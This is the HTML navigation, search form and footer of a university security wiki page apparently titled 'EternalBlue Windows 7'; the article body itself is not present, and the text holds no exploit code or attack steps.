						<h3>
							<label for="searchInput">Search</label>
						</h3>
						<form action="/mediawiki/index.php" id="searchform">
							<div id="simpleSearch">
								<input type="search" name="search" placeholder="Search csn" title="Search csn [Alt+Shift+f]" accesskey="f" id="searchInput" autocomplete="off"><input type="hidden" value="Special:Search" name="title"><input type="submit" name="go" value="Go" title="Go to a page with this exact name if it exists" id="searchButton" class="searchButton">							</div>
						</form>
					</div>
									</div>
			</div>
			<div id="mw-panel">
				<div id="p-logo" role="banner"><a class="mw-wiki-logo" href="https://csn.murdoch.edu.au/mediawiki/index.php/Main_Page" title="Visit the main page"></a></div>
						<div class="portal" role="navigation" id="p-navigation" aria-labelledby="p-navigation-label">
			<h3 id="p-navigation-label">Navigation</h3>
			<div class="body">
								<ul>
					<li id="n-mainpage-description"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Main_Page" title="Visit the main page [Alt+Shift+z]" accesskey="z">Main page</a></li><li id="n-recentchanges"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:RecentChanges" title="A list of recent changes in the wiki [Alt+Shift+r]" accesskey="r">Recent changes</a></li><li id="n-randompage"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:Random" title="Load a random page [Alt+Shift+x]" accesskey="x">Random page</a></li><li id="n-help-mediawiki"><a href="https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents">Help about MediaWiki</a></li>				</ul>
							</div>
		</div>
			<div class="portal" role="navigation" id="p-tb" aria-labelledby="p-tb-label">
			<h3 id="p-tb-label">Tools</h3>
			<div class="body">
								<ul>
					<li id="t-whatlinkshere"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:WhatLinksHere/EternalBlue_Windows_7" title="A list of all wiki pages that link here [Alt+Shift+j]" accesskey="j">What links here</a></li><li id="t-recentchangeslinked"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:RecentChangesLinked/EternalBlue_Windows_7" rel="nofollow" title="Recent changes in pages linked from this page [Alt+Shift+k]" accesskey="k">Related changes</a></li><li id="t-upload"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:Upload" title="Upload files [Alt+Shift+u]" accesskey="u">Upload file</a></li><li id="t-specialpages"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Special:SpecialPages" title="A list of all special pages [Alt+Shift+q]" accesskey="q">Special pages</a></li><li id="t-print"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;printable=yes" rel="alternate" title="Printable version of this page [Alt+Shift+p]" accesskey="p">Printable version</a></li><li id="t-permalink"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;oldid=2086" title="Permanent link to this revision of the page">Permanent link</a></li><li id="t-info"><a href="https://csn.murdoch.edu.au/mediawiki/index.php?title=EternalBlue_Windows_7&amp;action=info" title="More information about this page">Page information</a></li>				</ul>
							</div>
		</div>
				</div>
		</div>
				<div id="footer" role="contentinfo">
						<ul id="footer-info">
								<li id="footer-info-lastmod"> This page was last edited on 13 April 2022, at 01:52.</li>
								<li id="footer-info-copyright">Content is available under <a class="external" rel="nofollow" href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a> unless otherwise noted.</li>
							</ul>
						<ul id="footer-places">
								<li id="footer-places-privacy"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Csn:Privacy_policy" title="Csn:Privacy policy">Privacy policy</a></li>
								<li id="footer-places-about"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Csn:About" title="Csn:About">About csn</a></li>
								<li id="footer-places-disclaimer"><a href="https://csn.murdoch.edu.au/mediawiki/index.php/Csn:General_disclaimer" title="Csn:General disclaimer">Disclaimers</a></li>
							</ul>
										<ul id="footer-icons" class="noprint">
										<li id="footer-copyrightico">
						<a href="https://creativecommons.org/licenses/by-sa/4.0/"><img src="EternalBlue%20Windows%207%20-%20csn_files/by-sa.svg" alt="Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)" width="88" height="31"></a>					</li>
										<li id="footer-poweredbyico">
						<a href="https://www.mediawiki.org/"><img src="EternalBlue%20Windows%207%20-%20csn_files/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" srcset="EternalBlue%20Windows%207%20-%20csn_files/poweredby_mediawiki_132x47.png 1.5x, EternalBlue%20Windows%207%20-%20csn_files/poweredby_mediawiki_176x62.png 2x" width="88" height="31"></a>					</li>
									</ul>
						<div style="clear: both;"></div>
		</div>
		

<script>(RLQ=window.RLQ||[]).push(function(){mw.config.set({"wgPageParseReport":{"limitreport":{"cputime":"0.031","walltime":"0.037","ppvisitednodes":{"value":92,"limit":1000000},"ppgeneratednodes":{"value":0,"limit":1000000},"postexpandincludesize":{"value":0,"limit":2097152},"templateargumentsize":{"value":0,"limit":2097152},"expansiondepth":{"value":2,"limit":40},"expensivefunctioncount":{"value":0,"limit":100},"unstrip-depth":{"value":0,"limit":20},"unstrip-size":{"value":347,"limit":5000000},"timingprofile":["100.00%    0.000      1 -total"]},"cachereport":{"timestamp":"20241119221519","ttl":86400,"transientcontent":false}}});mw.config.set({"wgBackendResponseTime":80});});</script>


<div style="display: none; font-size: 13px;" class="suggestions"><div class="suggestions-results"></div><div class="suggestions-special"></div></div></body><grammarly-desktop-integration data-grammarly-shadow-root="true"></grammarly-desktop-integration></html>